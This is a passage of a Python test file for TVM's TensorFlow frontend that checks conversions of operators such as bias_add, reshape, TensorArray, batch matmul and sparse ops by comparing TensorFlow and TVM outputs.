in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
        # make paddings the output of an op (tf.reverse) rather than a graph input,
        # so the frontend has to extract it with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
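# Shape bookkeeping for the cases above: space_to_batch_nd multiplies the batch
# dimension by prod(block_shape) and divides each padded spatial dimension by
# its block size, so e.g. input [1, 2, 2, 1] with block_shape [2, 2] and zero
# paddings produces output shape [4, 1, 1, 1].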
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
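# batch_to_space_nd is the inverse transform: the batch dimension is divided by
# prod(block_shape) and the cropped spatial dimensions are multiplied by the
# block sizes, so e.g. input [4, 1, 1, 1] with block_shape [2, 2] and zero
# crops produces output shape [1, 2, 2, 1].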
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
"""One iteration of reshape operation with given data and out shape"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
"""relay.expr.Call as shape"""
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
"""A special case for reshape."""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
"""One iteration of depth_to_space operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
"""One iteration of space_to_depth operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
"""One iteration of squeeze"""
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
"""Squeeze"""
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str), dtype=dtype)
indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(
dtype=dtype, size=3, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
"""One iteration of ConcatV2"""
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
"""One iteration of sigmoid"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
"""Sigmoid"""
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
"""One iteration of a variable"""
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
"""Read Variable op test"""
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
"""One iteration of matmul"""
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def test_forward_matmul():
"""MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
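# In tf.matmul, adjoint_a/adjoint_b transpose (conjugate-transpose for complex
# dtypes) the last two dimensions of the corresponding operand before the
# batched multiply, which is why test_forward_batch_matmul below can pair
# shapes such as (3, 5, 4) with (3, 5, 4) when one of the flags is set.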
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
        # For now, only the cuBLAS implementation in TOPI supports dynamic shapes.
        # TODO: add support for more backends in TOPI.
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, mode="vm", targets=["cuda -libs=cublas"]
)
def test_forward_batch_matmul():
"""TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
@tvm.testing.requires_cuda
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
"""One iteration of sparse_dense_matmul"""
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
"""sparse_dense_matmul op test"""
###################################################################
#
    # Creating a SparseTensor requires 3 inputs, as below:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The sparse tensor above corresponds to the following dense tensor:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
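    # As a worked example for the first case below, indices [[0, 0], [1, 2]] with
    # values [4.0, 8.0] and dense_shape [3, 4] correspond to the dense matrix
    #   [[4, 0, 0, 0],
    #    [0, 0, 8, 0],
    #    [0, 0, 0, 0]]
    # which the test multiplies against a random dense operand (transposed
    # variants are also exercised via the adjoint flags).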
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
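# tf.sparse.fill_empty_rows inserts default_value at column 0 of every row of
# the dense shape that has no entry and also returns an empty-row indicator.
# For instance, in the first parametrized case below rows 0-3 of the [5, 6]
# shape are populated, so only row 4 gains the entry (4, 0) -> 10.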
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
"""sparse_fill_empty_rows op test"""
###################################################################
#
    # Creating a SparseTensor requires 3 inputs, as below:
    #   SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
    #
    # The sparse tensor above corresponds to the following dense tensor:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
